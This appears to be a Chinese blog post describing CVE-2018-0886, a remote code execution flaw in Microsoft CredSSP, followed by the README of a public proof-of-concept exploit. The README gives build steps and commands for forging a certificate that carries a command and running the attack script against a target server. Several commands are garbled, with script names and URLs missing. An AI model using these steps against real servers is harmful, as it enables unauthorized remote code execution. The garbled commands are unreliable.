Microsoft CredSSP CVE-2018-0886远程执行代码漏洞

2018-04-1614:52:37 发表评论

Microsoft CredSSP CVE-2018-0886远程执行代码漏洞


Microsoft Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1和RT 8.1,Windows Server 2012和R2,Windows 10 Gold,1511,1687,1703和1709中的凭证安全支持提供程序协议(CredSSP)Windows Server 2016由于CredSSP在身份验证过程中验证请求的方式(即“CredSSP远程执行代码漏洞”),1709版本允许存在远程执行代码漏洞。


# credssp

This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
It relies on a fork of the rdpy project(, allowing also credssp relay. 

Written by Eyal Karni, Preempt 

# Build

## Instructions (Linux)
If you are using Ubuntu 14 , check the install file.. 
It was tested on Ubuntu 16.04. 

$ git clone rdpy
$ git clone
$ cd credssp/install
$ sh
$ cd ../../rdpy
$ sudo python install

EDB Mirror:

* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).  
* A different version of openssl needed to be installed for this to run successfully.  The install script does that. 
* Please follow the instructions in the described order. 

# Running the exploit 

Export a certificate suitable for Server Authentication from any domain.

To generate a suitable certificate for the command to execute : 

$ python credssp/bin/ -c ExportedCert -o exploitc.pem -k exploitk.pem CMD

(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)

To run the attack script: 

$ python /usr/local/bin/ -k exploitk.pem -c exploitc.pem TargetServer

More details are in the usage section of the scripts(--help).